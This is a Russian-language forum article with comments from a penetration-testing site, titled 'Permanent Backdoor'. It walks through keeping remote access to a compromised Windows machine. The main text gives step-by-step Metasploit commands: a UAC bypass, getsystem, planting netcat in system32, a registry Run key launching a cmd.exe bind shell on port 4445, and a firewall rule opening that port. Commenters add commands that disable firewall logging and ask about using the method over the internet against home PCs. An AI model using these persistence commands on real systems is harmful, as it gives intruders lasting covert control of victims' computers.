• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Статья Permanent Backdoor

Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру.

upload_2016-10-31_21-14-49.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter:

upload_2016-10-31_21-15-24.png


Для продолжения, необходимо обойти UAC на целевом хосте:

> use exploit/windows/local/bypassuac_injection

И по порядку выполняем команды, как показано на скриншоте ниже:

upload_2016-10-31_21-15-50.png


В случае успеха вывод команды getsystem будет таким:

upload_2016-10-31_21-16-18.png


Теперь, необходимо загрузить на целевую систему программу netcat - это утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Делается это следующим образом, вводим в консоли meterpreter:

> upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

upload_2016-10-31_21-16-51.png


Затем редактируем реестр цели, для запуска netcat при загрузке:

> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat –d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’


upload_2016-10-31_21-17-43.png


Открываем shell, для того чтобы внести свои поправки в firewall целевого хоста.

> shell

upload_2016-10-31_21-18-18.png


Вносим правило в firewall:

> netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

netsh —
программа, включенная в линейку продуктов операционных систем Microsoft Windows NT начиная с Windows 2000. Она позволяет осуществлять локальное или удаленное конфигурирование сетевых параметров.

upload_2016-10-31_21-20-47.png


Убедимся, что наши усилия не прошли даром, и правило было успешно добавлено:

> netsh firewall show portopening

upload_2016-10-31_21-21-27.png


Все ок. Перезагрузим целевой хост, а перед этим откроем второй терминал в Kali и введем команду:

> nc -nv 192.168.0.109 4445 (Где 192.168.0.109 – адрес целевой машины)

После перезагрузки получаем shell на целевой системе:

upload_2016-10-31_21-22-43.png
 
После ввода команды "exploit" выводит ошибку:
Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
Exploit complated, but no session was created.
 
Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
 
Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
В начале писал - В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109.
 
Очевидно же, что эксплойт ругается на номер сессии. У вас точно есть активная сессия meterpreter под номером 1?
 
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
 
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ - Посмотрите тут, эта схема работает
 
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
Добрый день,, все тоже самое..только место локального своего ip указываете ip на vps.Бывают конечно небольшие отличия , но это зависит от каждого конкретного случая,некоторые виды пентеста можно сделать только в сегменте локальной сети.Иногда у меня сессия не работает с reverse_tcp я тогда заменяю на reverse_https.Старайтесь не действовать по шаблону.,шаблон хорош когда вы осваиваете. Я вообще пентест сравниваю с шахматами,но это сугубо мое личное мнение.
 
  • Нравится
Реакции: Dmitry88 и Vander
Хочу посоветовать вам начать с основ сетей (проброс порта, классы подсетей и т.д) И у вас не будет таких вопросов
 
  • Нравится
Реакции: Vander
На каком-то сайте я уже видел эту статью, только английскую версию.
 
На всякий случай: если нужно добавить правила в огнестенку на Winxp, то advfirewall не работает.
Нуно что-то вроде:
netsh firewall add portopening protocol=TCP port=4445 name=netcat
netsh firewall add allowedprogram C:\WINDOWS\System32\nc.exe

И не мешало бы:
netsh firewall set logging %systemroot%\system32\LogFiles\Firewall\pfirewall.log 4096 DISABLE DISABLE
 
  • Нравится
Реакции: Vander
p.s. и есть одно важное уточнение. Допустим получили meterpreter-сессию.
Пробуем добавить правила в фаерволл, и если нам сообщается, что он выключен, то его нужно включить (пример для WinXP):
sc config SharedAccess start= auto
а потом запустим net start SharedAccess. Через минуту потеряем сессию.
При повторной попытке провести эксплойт, msf вам радостно сообщит, что эксплойт прошел, но сессию создать никак не выйден.
Nmap -v <host> -p <port> вам покажет печальную картину, что все порты фильтруются.
Т.о. сами отрубим себе руки :)
 
  • Нравится
Реакции: ghostphisher и Vander
Vander: Вы уж ..простите за глупый вопрос.. Данным способом можно получить права администратора (getsystem) на windows 7 ?
 
Vander: Уж не знаю ..правильно ли я делал (улыбнуло) . Сам вирус делал по этому (видео)
, дальше дела по вашему гайду .. Сюда по всему что то получилось
... Еще раз вопрос .. сие действие возможно сделать в глобальной сети (я имею ввиду не только на виртуальной машине ) ? Как то непонятно(улыбнуло) мне в команде слово "local"
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD